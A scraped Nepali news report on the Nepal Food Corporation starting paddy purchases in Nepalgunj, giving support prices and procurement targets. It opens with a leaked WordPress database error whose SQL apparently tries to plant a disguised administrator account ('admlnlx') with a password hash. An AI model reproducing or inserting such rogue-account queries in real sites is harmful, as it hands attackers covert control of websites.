WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0ycMvmO07N94/0ejaPOM5PnWsLGqz0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 04:44:09', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, मंसिर २९ –
नेपाल खाद्य संस्थानको अञ्चल कार्यालयले आजदेखि कृषकसँग धान खरिद सुरु गरेको छ ।
समर्थन मूल्य निर्धारण समितिले धानको मूल्य तोकेको करिब दुई सातापछि संस्थानले कारकाँदोस्थित आफ्नो कार्यालयबाट धान खरिद सुरु गरेको हो । मोटा धान प्रतिक्विन्टल रु दुई हजार ५० र मध्यम धानको रु दुई हजार १५० मूल्य निर्धारण गरेको कार्यालय प्रमुख मोतीराज ज्ञवालीले जानकारी दिनुभयो ।
पहिलो चरणमा २० हजार क्विन्टल धान खरिद गर्ने लक्ष्य रहेको ज्ञवालीको भनाइ छ । गत वर्ष मोटा धान प्रतिक्विन्टल रु एक हजार ९२५ र मध्यम धान रु दुई हजार ५० मा खरिद गरिएको थियो । – रासस